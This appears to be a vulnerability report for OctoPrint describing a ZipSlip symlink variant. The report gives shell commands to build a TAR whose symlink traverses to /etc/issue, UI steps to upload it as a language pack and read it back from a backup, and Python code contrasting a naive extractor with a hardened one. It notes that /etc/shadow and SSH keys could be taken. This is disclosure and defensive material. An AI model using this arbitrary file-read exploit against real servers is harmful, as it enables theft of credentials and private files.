ZipSlip symlink variant allows reading any file on the OctoPrint box in octoprint/octoprint
Aug 24th 2022
Using the ZipSlip symlink variant, an attacker can steal any file from the remote OctoPrint server: upload a maliciously crafted archive containing a symlink as a language pack, then create a backup and download the content of the targeted file inside the backup archive. The archive extraction checks the member names but not where a symlink points, and the backup follows the planted symlink when it reads the translations directory.
To set up the OctoPrint web application, we used the dockerized version:
sudo docker volume create octoprint
sudo docker run -d -v octoprint:/octoprint -p 80:80 --name octoprint octoprint/octoprint
Generate a maliciously crafted archive as follows:
# unpack the Italian language pack (it/) and create the symlink inside it/LC_MESSAGES/
# (that is where the backup later shows it); notice the ./ prefix in front of the ../ sequence
cd it/LC_MESSAGES
ln -s ././../../../../../../../../../etc/issue issue.y3
cd ../..
# pack the result as a maliciously crafted TAR archive; tar stores the symlink target as-is
tar -cvf it_crafted.tar ./it/
After the initial configuration with default parameters, log in and head to OctoPrint Settings > Appearance > Language Packs. Click on Manage > Upload additional Language Packs and upload the it_crafted.tar archive as a language pack.
Now head to OctoPrint Settings > Backup & Restore and click on Create backup now. Download the new backup archive and read the file located inside it at /basedir/translations/it/LC_MESSAGES/issue.y3: it contains the server-side /etc/issue file, because the backup followed the symlink instead of archiving it as a link.
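The whole chain reduced to the two library calls involved, as an added Python example that is not part of the original report or of OctoPrint's code: it builds the crafted TAR in memory with tarfile (no on-disk symlink needed), extracts it the way a name-only Zip Slip check would allow, and then zips the translations directory the way a backup does, which follows the planted symlink and captures the target's content. Next to it is a hardened extractor that refuses symlink members and anything resolving outside the destination. The directory layout, the stand-in for /etc/issue and its content are constructed for the demo; the number of ../ steps in the link target is adapted to that layout.

```python
import io
import tarfile
import tempfile
import zipfile
from pathlib import Path

# Member name and link target mirror the report (the "./" prefix is kept); the
# number of "../" steps matches the constructed temp layout in demo() below.
LINK_NAME = "it/LC_MESSAGES/issue.y3"
LINK_TARGET = "././../../../../secret/issue"


def build_crafted_tar(link_name: str = LINK_NAME, link_target: str = LINK_TARGET) -> bytes:
    """Return a TAR archive holding a single symlink member; no symlink needs to exist on disk."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        info = tarfile.TarInfo(name=link_name)
        info.type = tarfile.SYMTYPE
        info.linkname = link_target  # stored verbatim; tar never sanitises link targets
        tar.addfile(info)
    return buf.getvalue()


def _filter_kwargs(name: str) -> dict:
    # Python 3.12+ (and backports) added extraction filters (PEP 706); older versions
    # have no 'filter' argument and behave like 'fully_trusted'.
    return {"filter": name} if hasattr(tarfile, "data_filter") else {}


def extract_naive(tar_bytes: bytes, dest: Path) -> None:
    """Name-only Zip Slip check: '..' in member names is rejected, symlink targets are not."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes)) as tar:
        for m in tar.getmembers():
            if ".." in Path(m.name).parts or Path(m.name).is_absolute():
                raise ValueError(f"path traversal in member name: {m.name}")
        tar.extractall(dest, **_filter_kwargs("fully_trusted"))


def extract_hardened(tar_bytes: bytes, dest: Path) -> None:
    """Allow only regular files and directories whose resolved path stays inside dest."""
    dest = dest.resolve()
    with tarfile.open(fileobj=io.BytesIO(tar_bytes)) as tar:
        for m in tar.getmembers():
            if not (m.isfile() or m.isdir()):
                raise ValueError(f"refusing non-regular member: {m.name}")
            target = (dest / m.name).resolve()
            if target != dest and dest not in target.parents:
                raise ValueError(f"member escapes destination: {m.name}")
        tar.extractall(dest, **_filter_kwargs("data"))


def make_backup(src: Path) -> bytes:
    """Zip a directory tree the way a backup does: ZipFile.write() follows symlinks."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for p in sorted(src.rglob("*")):
            if p.is_file():  # True for a symlink that points at a readable file
                zf.write(p, p.relative_to(src).as_posix())
    return buf.getvalue()


def demo() -> dict:
    """Run the full chain in a temp dir; report what leaked and whether hardening blocked it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        secret = root / "secret" / "issue"  # constructed stand-in for /etc/issue
        secret.parent.mkdir()
        secret.write_text("constructed server-side secret\n")
        translations = root / "basedir" / "translations"  # stand-in for basedir/translations
        translations.mkdir(parents=True)

        crafted = build_crafted_tar()
        extract_naive(crafted, translations)  # plants the symlink under it/LC_MESSAGES/
        link = translations / LINK_NAME
        backup = make_backup(translations)  # follows the symlink and stores the target's bytes
        with zipfile.ZipFile(io.BytesIO(backup)) as zf:
            leaked = zf.read(LINK_NAME).decode()

        clean = root / "clean"
        clean.mkdir()
        try:
            extract_hardened(crafted, clean)
            rejected = False
        except ValueError:
            rejected = True
        return {"is_symlink": link.is_symlink(), "leaked": leaked, "hardened_rejected": rejected}


if __name__ == "__main__":
    print(demo())
```

The naive extractor is the pattern the report exploits: the classic Zip Slip check inspects member names, and the symlink's name is perfectly ordinary; only its target traverses. The backup step does not need to be malicious at all, since ZipFile.write() opens the path it is given and therefore reads through the link. Refusing link members outright is the simplest fix for an upload type like a language pack that never legitimately contains them.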
Any file readable by the user the OctoPrint process runs as can be exfiltrated this way. Where it runs as root, that includes /etc/shadow (password hashes that can then be cracked offline) and the keys under ~/.ssh, which can give remote access to the OctoPrint box.